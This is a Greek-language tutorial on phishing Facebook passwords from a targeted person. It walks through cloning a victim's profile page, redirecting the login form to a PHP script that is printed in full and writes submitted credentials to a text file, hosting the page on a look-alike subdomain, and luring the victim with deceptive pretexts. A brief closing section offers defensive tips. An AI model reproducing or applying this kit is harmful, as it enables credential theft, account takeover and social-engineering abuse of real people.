Πως κλεβετε κωδικο απο στοχευμενο χρηστη του Facebook (Advance Phishing)

Τι θα χρειαστείτε;

1.Windows η οποιαδήποτε άλλο λειτουργικό




Πατάμε εδώ και δημιουργούμε ένα λογαριασμό δείτε εικόνα κάτω
 

-βάζουμε τα στοιχεία μας 
-θα μας ζητήσει να κάνουμε επιβεβαίωση κτλ όταν κάνουμε και έχουμε επιτυχώς φτιάξει τον λογαριασμό τότε επιλέγουμε στην καρτέλα δωρεάν παραγγελία δείτε εικόνα κάτω

-θα μας εμφανίσει τις κάτω επιλογές

-στο subdomain θα γράψετε κάτι παραπλήσιο του facebook η το όνομα του θύματος

-μετά ανοίγουμε μια καρτέλα και του facebook και πάμε στο προφίλ του θύματος.
*για εκπαιδευτικούς σκοπούς θα χρησιμοποιήσω το προφίλ της γνωστής χορεύτριας Katerina Dancer που συμφώνησε να χρησιμοποιήσω την φωτογραφία της και το όνομα σε αυτόν τον οδηγό

-οπότε πηγαίνουμε στο προφίλ της και αντιγράφουμε την url

που είναι https://www.facebook.com/katerina.dancer.5

-αποσυνδεόμαστε από το facebook και κάνουμε επικόλληση της url στον περιηγητή μας δείτε εικόνα κάτω

 -πατάμε τα πλήκτρα ctrl+u και μας ανοίγει τον κώδικα της σελίδας δείτε εικόνα κάτω

-τώρα επιλέγουμε όλο το περιεχόμενο με τα πλήκτρα ctrl+a και ctrl+c το αντιγράφουμε
-ανοίγουνε ένα έγγραφο κειμένου (notepad) και με cltr+v κάνουμε επικόλληση
-πατάμε ctrl+f για να φέρουμε την αναζήτηση και γράφουμε μέσα στο κουτάκι Katerina Dancer δείτε εικόνα κάτω

 -καθώς μας έχει βρει το όνομα απλά εμείς το αλλάζουμε σε ότι θέλουμε πχ εγώ θα το αλλάξω σε Κοπέλα Λάστιχο απλά για ευκολία σας κάνετε αντιγραφή το "Κοπέλα Λάστιχο" δλδ το ονομα που θελετε να δωσετε και με ctrl+f φέρνετε την αναζήτηση και μετά ctrl+v για να το αντικαταστησετε με επικολληση μετά πάλι μέχρι να αλλάξετε το όνομα σε όλο τον κώδικα 4-5 φορες νομιζω θα χρειαστει να αλλάξετε
-μετά παλι με ctrl+f κανουμε αναζήτηση action="https://www.facebook.com/login.php?login_attempt=1" και το αλλάζουμε σε action="post.php"
-τελος αποθηκευουμε το αρχειο σε index.html
-ανοίγουμε ενα έγγραφο κειμένου και αντιγράφουμε αυτόν τον κώδικα

 <?php
header ('Location:http://www.facebook.com');
$handle = fopen("kodikoi.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

-τον κάνουμε επικόλληση στο αρχειο κειμένου και το αποθηκευουμε ως post.php
-τελος πηγαίνουμε στο hostinger.gr και επιλέγουμε αλλαγη δείτε εικόνα κάτω

 -μετά πηγαίνουμε λιγο κατω και επιλέγουμε Διαχειριστης Αρχειων 2 δειτε εικονα κατω

-και τωρα ανεβαζουμε τα 2 αρχεια δλδ το index.html και post.php δειτε εικονα κατω

 -επιλεγουμε log off και ειμαστε ετοιμοι
-τωρα απλα στελνουμε στο θυμα μας την σελιδα που δημιουργησαμε δλδ στην δικια μας περιπτωση http://foc3book.zz.mu

-οταν ανοιξει το θυμα το συνδεσμο που του στειλαμε τοτε θα του εμφανιστει η παρακατω σελιδα

-Τωρα για να κανουμε το θυμα να πατησει στο link χρειζονται 2 πραγματα εμπιστοσυνη και δολο

-Ο δολος στο παραδειγμα μας ειναι να πουμε στο θυμα οτι καποιος εφτιαξε ψευτικο προφιλ με αυτη ,οτι εκλεψε φωτογραφιες η οτι εσεις πιστευετε οτι το θυμα θα τσιμπισει.

-τελος για να δουμε αν τσιμπισε το θυμα βαζουμε στην url της σελιδα /kodikoi.txt πχ http://foc3book.zz.mu//kodikoi.txt δειτε εικονα κατω

Πως θα προστατευτειτε;

Απλα παντα οταν σας στελνουνε κατι παντα να κοιτατε το url και να ρωτατε τι ειναι πχ στο παραδειγμα το url ειναι http://foc3book.zz.mu οποτε καμια σχεση με το https://www.facebook.com
Bαλτε σαν ασφαλεια το κινητο και να σας ερχετε κωδικος για καθε φορα που συνδεεστε απο αγνωστη συσκευη στο facebook
Αν δε ειστε σιγουροι για κατι απλα βαλτε λανθασμενα στοιχεια αν δειτε οτι συνδεεστε τοτε ειναι σελιδα Phishing